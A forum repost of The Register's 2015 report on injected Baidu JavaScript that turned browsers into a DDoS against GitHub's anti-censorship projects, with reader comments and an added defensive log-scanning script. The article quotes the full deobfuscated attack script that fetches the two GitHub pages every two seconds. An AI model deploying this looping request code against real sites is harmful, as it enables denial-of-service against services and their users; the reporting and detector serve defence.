[News] The injected JavaScript used to smash

Original poster: shyangs (厚呦)   2015-03-29 20:22:43
1. Media source: The Register
2. Full news headline:
The injected JavaScript used to smash anti-Great Firewall of China GitHub
projects offline
Malicious JavaScript from Baidu is used to attack GitHub
3. Full news text:
GitHub's servers are being hammered by web traffic from an army of unwitting
cyber-foot-soldiers.
It appears when thousands of people visit websites that serve ads and
tracking code from Baidu – China's answer to Google – from outside the
Middle Kingdom, network gateways on the Chinese border silently inject a
JavaScript function into those websites' pages.
This simple code instructs browsers to stealthily connect to GitHub.com every
two seconds, creating "an extremely large amount of traffic," the San
Francisco-based upstart said.
The JS specifically targets two GitHub-hosted projects – Greatfire and
CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of
China. The firewall blocks things like VPNs and censors web traffic, hiding
information on the Tiananmen Square massacre and so on.
GitHub said on Friday that the bursts in traffic, effectively a string of
distributed denial-of-service attacks, are causing intermittent outages.
"We're aware that GitHub.com is intermittently unavailable for some users
during the ongoing DDoS," GitHub said in a status update at 1549 UTC today.
"Restoring service for all users while deflecting attack traffic is our
number one priority. We've deployed our volumetric attack defenses against an
extremely large amount of traffic. Performance is stabilizing."
Hours earlier, the biz noted: "We've been under continuous DDoS attack for
24+ hours. The attack is evolving, and we're all hands on deck mitigating."
According to a security researcher at Insight Labs, HTTP requests to
hm.baidu.com/h.js are being hijacked by China's border gateways, which insert
some semi-obfuscated JavaScript to attack the aforementioned GitHub
repositories. The injected script looks like this, once unscrambled:
document.write("<script src=" +
    "'http://libs.baidu.com/jquery/2.0.0/jquery.min.js'" +
    ">\x3c/script>");
!window.jQuery && document.write(
    "<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return ( Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(),
        a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 )
}
url_array = ["https://github.com/greatfire/",
    "https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);
The Greatfire project provides links to cloud-hosted mirrors of websites –
such as the BBC and Google's Blogger – that Chinese people can use to dodge
the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's
pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the
New York Times.
"A certain device at the border of China's inner network and the Internet has
hijacked the HTTP connections went into China, replaced some javascript files
from Baidu with malicious ones that would load [the GitHub pages] every two
seconds," Insight Labs' Anthr@x wrote.
"In other words, even people outside China are being weaponized to target
things the Chinese government does not like, for example, freedom of speech."
While there is no proof that the Chinese government was directly involved in
the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that
someone, state or otherwise, wants these projects silenced.
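Malicious JavaScript from Baidu was found hijacking unwitting users' traffic to DDoS GitHub.
The malicious script instructs browsers to connect to GitHub.com once every two seconds, sending GitHub a huge amount of traffic.
The script targets two projects on GitHub, Greatfire and CN-NYTimes.
GitHub said the traffic bursts produced by the DDoS are making some services intermittently unavailable.
So far there is no direct evidence that the Chinese government was directly involved in this attack.
4. Full news link (or short URL): http://tinyurl.com/pydfc5f
5. Remarks: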
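Seen from a network defender's side, the loop in the quoted script leaves a recognizable trace: one client requesting the two `url_array` pages over and over inside the script's 3E5 ms lifetime. The following is an added example, not part of the original post or The Register's article, that flags such clients in a web-proxy log. It assumes a proxy that records full URLs (for HTTPS that means TLS inspection); the entry fields `ts`, `client`, `url`, the `MIN_HITS` threshold and the sample log are all constructed for illustration.

```javascript
// Added example: log format, thresholds and sample data are constructed.
const TARGETS = ["https://github.com/greatfire/",
                 "https://github.com/cn-nytimes/"];   // url_array from the script
const WINDOW_MS = 3e5;  // the script stops rescheduling 3E5 ms after it starts
const MIN_HITS = 10;    // assumed threshold: hits per client inside one window

// entries: [{ ts: epoch milliseconds, client: string, url: string }]
function findLoopingClients(entries, minHits = MIN_HITS) {
  const byClient = new Map();
  for (const e of entries) {
    if (!TARGETS.includes(e.url)) continue;
    if (!byClient.has(e.client)) byClient.set(e.client, []);
    byClient.get(e.client).push(e);
  }
  const findings = [];
  for (const [client, hits] of byClient) {
    hits.sort((a, b) => a.ts - b.ts);
    // Sliding window: the most target hits this client made in WINDOW_MS.
    let best = 0, lo = 0;
    for (let hi = 0; hi < hits.length; hi++) {
      while (hits[hi].ts - hits[lo].ts > WINDOW_MS) lo++;
      best = Math.max(best, hi - lo + 1);
    }
    if (best >= minHits) {
      const urls = [...new Set(hits.map((h) => h.url))].sort();
      findings.push({ client, maxHitsInWindow: best, urls });
    }
  }
  return findings;
}

// Constructed sample log (not real traffic).
function sampleLog() {
  const t0 = Date.UTC(2015, 2, 27, 12, 0, 0);
  const log = [];
  // 10.0.0.5: a browser running the loop, one request about every 2 s.
  for (let i = 0; i < 60; i++)
    log.push({ ts: t0 + i * 2000, client: "10.0.0.5", url: TARGETS[i % 2] });
  // 10.0.0.9: a person opening one of the pages three times in an hour.
  for (let i = 0; i < 3; i++)
    log.push({ ts: t0 + i * 1200000, client: "10.0.0.9", url: TARGETS[0] });
  // 10.0.0.7: unrelated GitHub browsing (placeholder repository path).
  log.push({ ts: t0, client: "10.0.0.7", url: "https://github.com/example/repo" });
  return log;
}

console.log(findLoopingClients(sampleLog()));
```

A flagged client is a browser that loaded a page carrying the injected script, so the follow-up is finding which site served it, not treating the user as hostile.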
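Author: ppttcc (ppttcc5566)   2015-03-29 20:23:00
The injected javascript is used to smash up the Great Wall's China
Author: abc21086999 (呵呵)   2015-03-29 20:24:00
UK government: Huawei is trustworthy
Author: loa123 (撕裂地中海)   2015-03-29 20:24:00
may show gan mo
Author: zipizza ( )   2015-03-29 20:24:00
The motherland's goodwill
Author: deicide218 (软软)   2015-03-29 20:25:00
So nasty, only making users outside the country do the attacking XDDDDDDDDDDDDDD
Author: L0v35 (是零不是歐)   2015-03-29 20:27:00
Pretty fierce, this basically can't be caught
Author: TKSHADE (雨怎么下不停)   2015-03-29 20:27:00
The motherland's great firewall....
Author: web946719 (韦伯就是漏气依旧)   2015-03-29 20:28:00
Quick, upvote, or people will think we can't understand it
Author: silentence (小飞号:号:)   2015-03-29 20:31:00
Can't understand it END
Author: netsphere (Ruby&Waku)   2015-03-29 20:32:00
Visit Baidu, get javascript code for free
Author: HamalAri (哈马‧阿里)   2015-03-29 20:35:00
It's not the first time; they've also played with bt tracker dns spoofing before. This is who knows which Nth kind of gfw ddos attack.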
